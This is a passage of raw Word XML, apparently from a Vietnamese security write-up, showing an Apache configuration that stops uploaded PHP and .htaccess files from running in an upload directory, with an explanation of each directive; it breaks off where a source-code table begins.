        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17B7C1C1" w14:textId="77777777" w:rsidR="00564938" w:rsidRPr="00564938" w:rsidRDefault="00564938" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00564938">
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F90BB9D" w14:textId="77777777" w:rsidR="00564938" w:rsidRPr="00564938" w:rsidRDefault="00564938" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00564938">
              <w:t xml:space="preserve"> 2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E7A6035" w14:textId="77777777" w:rsidR="00564938" w:rsidRPr="00564938" w:rsidRDefault="00564938" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00564938">
              <w:t xml:space="preserve"> 3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67C9B9ED" w14:textId="77777777" w:rsidR="00564938" w:rsidRPr="00564938" w:rsidRDefault="00564938" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00564938">
              <w:t xml:space="preserve"> 4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40EEAFDC" w14:textId="77777777" w:rsidR="00564938" w:rsidRPr="00564938" w:rsidRDefault="00564938" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00564938">
              <w:t xml:space="preserve"> 5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FDD60F1" w14:textId="77777777" w:rsidR="00564938" w:rsidRPr="00564938" w:rsidRDefault="00564938" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00564938">
              <w:t xml:space="preserve"> 6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0ADCC51C" w14:textId="77777777" w:rsidR="00564938" w:rsidRPr="00564938" w:rsidRDefault="00564938" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00564938">
              <w:t xml:space="preserve"> 7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5282888E" w14:textId="77777777" w:rsidR="00564938" w:rsidRPr="00564938" w:rsidRDefault="00564938" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00564938">
              <w:t xml:space="preserve"> 8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74BD9111" w14:textId="77777777" w:rsidR="00564938" w:rsidRPr="00564938" w:rsidRDefault="00564938" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00564938">
              <w:t xml:space="preserve"> 9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27731F15" w14:textId="77777777" w:rsidR="00564938" w:rsidRPr="00564938" w:rsidRDefault="00564938" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00564938">
              <w:t>10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="067C1D4F" w14:textId="77777777" w:rsidR="00564938" w:rsidRPr="00564938" w:rsidRDefault="00564938" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00564938">
              <w:t>11</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="627D0769" w14:textId="77777777" w:rsidR="00564938" w:rsidRPr="00564938" w:rsidRDefault="00564938" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00564938">
              <w:t>12</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71922B52" w14:textId="77777777" w:rsidR="00564938" w:rsidRPr="00564938" w:rsidRDefault="00564938" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00564938">
              <w:t>13</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F94E360" w14:textId="77777777" w:rsidR="00564938" w:rsidRPr="00564938" w:rsidRDefault="00564938" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00564938">
              <w:t>14</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DE393A5" w14:textId="77777777" w:rsidR="00564938" w:rsidRPr="00564938" w:rsidRDefault="00564938" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00564938">
              <w:t>15</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EA3FC80" w14:textId="77777777" w:rsidR="00564938" w:rsidRPr="00564938" w:rsidRDefault="00564938" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00564938">
              <w:t>16</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="741AB95A" w14:textId="77777777" w:rsidR="00564938" w:rsidRPr="00564938" w:rsidRDefault="00564938" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00564938">
              <w:t>17</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40459F77" w14:textId="77777777" w:rsidR="00564938" w:rsidRPr="00564938" w:rsidRDefault="00564938" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00564938">
              <w:t>18</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A03761E" w14:textId="77777777" w:rsidR="00564938" w:rsidRPr="00564938" w:rsidRDefault="00564938" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00564938">
              <w:t>19</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01D7273B" w14:textId="77777777" w:rsidR="00564938" w:rsidRPr="00564938" w:rsidRDefault="00564938" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00564938">
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8707" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3608BD1A" w14:textId="77777777" w:rsidR="00564938" w:rsidRPr="00564938" w:rsidRDefault="00564938" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00564938">
              <w:t>&lt;Directory "/var/www/html/upload/"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="084B70E8" w14:textId="77777777" w:rsidR="00564938" w:rsidRPr="00564938" w:rsidRDefault="00564938" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00564938">
              <w:t xml:space="preserve">        AllowOverride None</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51373252" w14:textId="77777777" w:rsidR="00564938" w:rsidRPr="00564938" w:rsidRDefault="00564938" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00564938">
              <w:t xml:space="preserve">        Require all granted</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D925CEA" w14:textId="77777777" w:rsidR="00564938" w:rsidRPr="00564938" w:rsidRDefault="00564938" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="030350C8" w14:textId="77777777" w:rsidR="00564938" w:rsidRPr="00564938" w:rsidRDefault="00564938" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00564938">
              <w:t xml:space="preserve">        &lt;FilesMatch ".*"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="313EBEFB" w14:textId="77777777" w:rsidR="00564938" w:rsidRPr="00564938" w:rsidRDefault="00564938" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00564938">
              <w:t xml:space="preserve">                SetHandler None</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F31711C" w14:textId="77777777" w:rsidR="00564938" w:rsidRPr="00564938" w:rsidRDefault="00564938" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00564938">
              <w:t xml:space="preserve">        &lt;/FilesMatch&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36CD2C6B" w14:textId="77777777" w:rsidR="00564938" w:rsidRPr="00564938" w:rsidRDefault="00564938" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="782DD843" w14:textId="77777777" w:rsidR="00564938" w:rsidRPr="00564938" w:rsidRDefault="00564938" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00564938">
              <w:t xml:space="preserve">        Header set Content-Type application/octet-stream</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11CE88EA" w14:textId="77777777" w:rsidR="00564938" w:rsidRPr="00564938" w:rsidRDefault="00564938" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3B67352D" w14:textId="77777777" w:rsidR="00564938" w:rsidRPr="00564938" w:rsidRDefault="00564938" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00564938">
              <w:t xml:space="preserve">        &lt;FilesMatch ".+\.jpg$"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="016FD3B9" w14:textId="77777777" w:rsidR="00564938" w:rsidRPr="00564938" w:rsidRDefault="00564938" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00564938">
              <w:t xml:space="preserve">                Header set Content-Type image/jpeg</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A1A018D" w14:textId="77777777" w:rsidR="00564938" w:rsidRPr="00564938" w:rsidRDefault="00564938" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00564938">
              <w:t xml:space="preserve">        &lt;/FilesMatch&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12BA518C" w14:textId="77777777" w:rsidR="00564938" w:rsidRPr="00564938" w:rsidRDefault="00564938" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00564938">
              <w:t xml:space="preserve">        &lt;FilesMatch ".+\.png$"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10D72634" w14:textId="77777777" w:rsidR="00564938" w:rsidRPr="00564938" w:rsidRDefault="00564938" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00564938">
              <w:t xml:space="preserve">                Header set Content-Type image/png</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28E1512A" w14:textId="77777777" w:rsidR="00564938" w:rsidRPr="00564938" w:rsidRDefault="00564938" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00564938">
              <w:t xml:space="preserve">        &lt;/FilesMatch&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66F37B8B" w14:textId="77777777" w:rsidR="00564938" w:rsidRPr="00564938" w:rsidRDefault="00564938" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00564938">
              <w:t xml:space="preserve">        &lt;FilesMatch ".+\.(html|txt|php)"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25D761AF" w14:textId="77777777" w:rsidR="00564938" w:rsidRPr="00564938" w:rsidRDefault="00564938" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00564938">
              <w:t xml:space="preserve">                Header set Content-Type text/plain</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52CB366A" w14:textId="77777777" w:rsidR="00564938" w:rsidRPr="00564938" w:rsidRDefault="00564938" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00564938">
              <w:t xml:space="preserve">        &lt;/FilesMatch&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58F3510E" w14:textId="77777777" w:rsidR="00564938" w:rsidRPr="00564938" w:rsidRDefault="00564938" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00564938">
              <w:t>&lt;/Directory&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09796A0B" w14:textId="77777777" w:rsidR="00564938" w:rsidRPr="00564938" w:rsidRDefault="00564938" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2FFD11FD" w14:textId="31E3DEB7" w:rsidR="00466ECA" w:rsidRPr="00466ECA" w:rsidRDefault="00466ECA" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00466ECA">
        <w:t>Ý nghĩa từng phần</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA7EDE8" w14:textId="77777777" w:rsidR="00466ECA" w:rsidRPr="00466ECA" w:rsidRDefault="00466ECA" w:rsidP="004F0B2A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00466ECA">
        <w:t>AllowOverride None: Vô hiệu hóa .htaccess → ngăn attacker upload .htaccess để thay đổi cách xử lý MIME hoặc handler.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375E8C56" w14:textId="77777777" w:rsidR="00466ECA" w:rsidRPr="00466ECA" w:rsidRDefault="00466ECA" w:rsidP="004F0B2A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00466ECA">
        <w:t>Require all granted: Cho phép truy cập vào thư mục này từ mọi nguồn (có thể cần thiết cho file ảnh).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413A9BC7" w14:textId="77777777" w:rsidR="00466ECA" w:rsidRPr="00466ECA" w:rsidRDefault="00466ECA" w:rsidP="004F0B2A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00466ECA">
        <w:t>SetHandler None: Vô hiệu hóa mọi handler mặc định → ngăn Apache xử lý file theo kiểu PHP, CGI, v.v.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007707A6" w14:textId="77777777" w:rsidR="00466ECA" w:rsidRPr="00466ECA" w:rsidRDefault="00466ECA" w:rsidP="004F0B2A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00466ECA">
        <w:t>Header set Content-Type application/octet-stream: Thiết lập MIME mặc định cho tất cả file là nhị phân → ngăn trình duyệt tự động xử lý nội dung.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716D236C" w14:textId="77777777" w:rsidR="00466ECA" w:rsidRPr="00466ECA" w:rsidRDefault="00466ECA" w:rsidP="004F0B2A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00466ECA">
        <w:t>Các FilesMatch phía dưới dùng để ghi đè MIME cho các định dạng hợp lệ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F4E851" w14:textId="77777777" w:rsidR="00466ECA" w:rsidRPr="00466ECA" w:rsidRDefault="00466ECA" w:rsidP="004F0B2A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00466ECA">
        <w:t>.jpg → image/jpeg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088110AB" w14:textId="77777777" w:rsidR="00466ECA" w:rsidRPr="00466ECA" w:rsidRDefault="00466ECA" w:rsidP="004F0B2A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00466ECA">
        <w:lastRenderedPageBreak/>
        <w:t>.png → image/png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A692E2A" w14:textId="77777777" w:rsidR="00466ECA" w:rsidRPr="00466ECA" w:rsidRDefault="00466ECA" w:rsidP="004F0B2A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00466ECA">
        <w:t>.html, .txt, .php → text/plain → ngăn thực thi hoặc hiển thị HTML/PHP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101CDB04" w14:textId="2474A9D8" w:rsidR="00466ECA" w:rsidRPr="00466ECA" w:rsidRDefault="00466ECA" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00466ECA">
        <w:t>Tác dụng bảo vệ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0AE3DF" w14:textId="77777777" w:rsidR="00466ECA" w:rsidRPr="00466ECA" w:rsidRDefault="00466ECA" w:rsidP="004F0B2A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00466ECA">
        <w:t>Ngăn thực thi mã PHP ngay cả khi attacker upload file .php vào thư mục này.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D4BD6D" w14:textId="77777777" w:rsidR="00466ECA" w:rsidRPr="00466ECA" w:rsidRDefault="00466ECA" w:rsidP="004F0B2A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00466ECA">
        <w:t>Ngăn lộ nội dung HTML hoặc TXT dưới dạng giao diện web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7673C926" w14:textId="77777777" w:rsidR="00466ECA" w:rsidRPr="00466ECA" w:rsidRDefault="00466ECA" w:rsidP="004F0B2A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00466ECA">
        <w:t>Vô hiệu hóa .htaccess để tránh override cấu hình.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F8ACBE" w14:textId="77777777" w:rsidR="00466ECA" w:rsidRPr="00466ECA" w:rsidRDefault="00466ECA" w:rsidP="004F0B2A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00466ECA">
        <w:t>Chỉ cho phép hiển thị đúng MIME với ảnh .jpg, .png.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2907CB45" w14:textId="77777777" w:rsidR="00466ECA" w:rsidRPr="00466ECA" w:rsidRDefault="00466ECA" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00466ECA">
        <w:t>→ Đây là một cấu hình rất hiệu quả để bảo vệ thư mục upload trong các ứng dụng web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3000EB" w14:textId="3C893DB3" w:rsidR="00466ECA" w:rsidRDefault="00ED7FF3" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Thông</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tin source code xử lý chính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3A30C7" w:rsidRPr="00362E10" w14:paraId="18B5F66F" w14:textId="77777777" w:rsidTr="0017615F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="275" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B249D53" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00362E10">
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06B43D44" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00362E10">
              <w:t xml:space="preserve"> 2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B9F1173" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00362E10">
              <w:t xml:space="preserve"> 3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="306D4803" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00362E10">
              <w:t xml:space="preserve"> 4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B706FC2" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00362E10">
              <w:t xml:space="preserve"> 5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="537C490E" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00362E10">
              <w:t xml:space="preserve"> 6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="620B875C" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00362E10">
              <w:t xml:space="preserve"> 7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F54B620" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00362E10">
              <w:t xml:space="preserve"> 8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FDBE46F" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00362E10">
              <w:t xml:space="preserve"> 9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51D74513" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00362E10">
              <w:t>10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A81C012" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00362E10">
              <w:t>11</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EB24808" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00362E10">
              <w:t>12</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48823E69" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00362E10">
              <w:t>13</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47A12460" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00362E10">
              <w:t>14</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BFD55BD" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00362E10">
              <w:t>15</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10CEE57E" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00362E10">
              <w:t>16</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C46BE3B" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00362E10">
              <w:t>17</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70FCC4C2" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00362E10">
              <w:t>18</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C1532E6" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00362E10">
              <w:t>19</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="444E751A" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00362E10">
              <w:t>20</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10EF2E3B" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00362E10">
              <w:t>21</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42CD415C" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00362E10">
              <w:t>22</w:t>
            </w:r>
          </w:p>
